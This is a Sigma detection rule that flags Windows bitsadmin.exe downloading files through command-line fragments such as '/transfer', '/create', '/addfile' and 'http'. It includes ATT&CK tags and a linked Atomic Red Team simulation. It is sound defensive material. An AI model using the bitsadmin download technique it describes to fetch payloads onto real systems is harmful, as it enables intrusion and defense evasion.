File Download Via Bitsadmin

 1title: File Download Via Bitsadmin
 2id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
 3status: test
 4description: Detects usage of bitsadmin downloading a file
 5references:
 6    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 7    - https://isc.sans.edu/diary/22264
 8    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 9author: Michael Haag, FPT.EagleEye
10date: 2017-03-09
11modified: 2023-02-15
12tags:
13    - attack.persistence
14    - attack.execution
15    - attack.stealth
16    - attack.t1197
17    - attack.s0190
18    - attack.t1036.003
19    - attack.command-and-control
20    - attack.t1105
21logsource:
22    category: process_creation
23    product: windows
24detection:
25    selection_img:
26        - Image|endswith: '\bitsadmin.exe'
27        - OriginalFileName: 'bitsadmin.exe'
28    selection_cmd:
29        CommandLine|contains: ' /transfer '
30    selection_cli_1:
31        CommandLine|contains:
32            - ' /create '
33            - ' /addfile '
34    selection_cli_2:
35        CommandLine|contains: 'http'
36    condition: selection_img and (selection_cmd or all of selection_cli_*)
37falsepositives:
38    - Some legitimate apps use this, but limited.
39level: medium
40regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml
41simulation:
42    - type: atomic-red-team
43      name: Windows - BITSAdmin BITS Download
44      technique: T1105
45      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

References

• https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

  
  Read More

• https://isc.sans.edu/diary/22264

  
  Read More

• https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

  
  Read More

Related rules

• File Download Via Bitsadmin To A Suspicious Target Folder
• File With Suspicious Extension Downloaded Via Bitsadmin
• Suspicious Download From File-Sharing Website Via Bitsadmin
• Bitsadmin to Uncommon IP Server Address
• Bitsadmin to Uncommon TLD